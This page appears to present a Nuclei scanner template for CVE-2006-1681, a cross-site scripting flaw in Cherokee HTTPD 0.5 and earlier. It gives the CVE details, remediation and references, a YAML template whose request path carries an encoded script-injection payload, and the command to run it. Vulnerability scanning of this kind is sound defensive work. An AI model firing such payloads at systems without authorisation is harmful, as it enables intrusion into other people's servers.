Skip to content

Cherokee HTTPD <=0.5 - Cross-Site Scripting

ID: CVE-2006-1681

Severity: medium

Author: geeknik

Tags: cve,cve2006,cherokee,httpd,xss

Cherokee HTTPD 0.5 and earlier contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via a malformed request that generates an HTTP 400 error, which is not properly handled when the error message is generated.

id: CVE-2006-1681
info:
name: Cherokee HTTPD <=0.5 - Cross-Site Scripting
author: geeknik
severity: medium
description: Cherokee HTTPD 0.5 and earlier contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via a malformed request that generates an HTTP 400 error, which is not properly handled when the error message is generated.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
remediation: |
Upgrade to a patched version of Cherokee HTTPD or apply the necessary security patches to mitigate the XSS vulnerability.
reference:
- http://www.vupen.com/english/advisories/2006/1292
- https://nvd.nist.gov/vuln/detail/CVE-2006-1681
- https://exchange.xforce.ibmcloud.com/vulnerabilities/25698
- https://security.gentoo.org/glsa/202012-09
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
cvss-score: 4.3
cve-id: CVE-2006-1681
cwe-id: NVD-CWE-Other
epss-score: 0.01015
epss-percentile: 0.82067
cpe: cpe:2.3:a:cherokee:cherokee_httpd:0.1:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: cherokee
product: cherokee_httpd
tags: cve,cve2006,cherokee,httpd,xss
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}"
host-redirects: true
max-redirects: 2
matchers:
- type: word
words:
- "Cherokee"
case-insensitive: true
internal: true
- method: GET
path:
- "{{BaseURL}}/%2F..%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 4b0a0048304602210099220370851d360dcc2112b19968336872b31286e6b36fdfb10bd789677e7d26022100b55e13e750cf697c662dc5d1f39be91ef4ef435640fd54fbd268286c0384e83d:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2006/CVE-2006-1681.yaml"

View on Github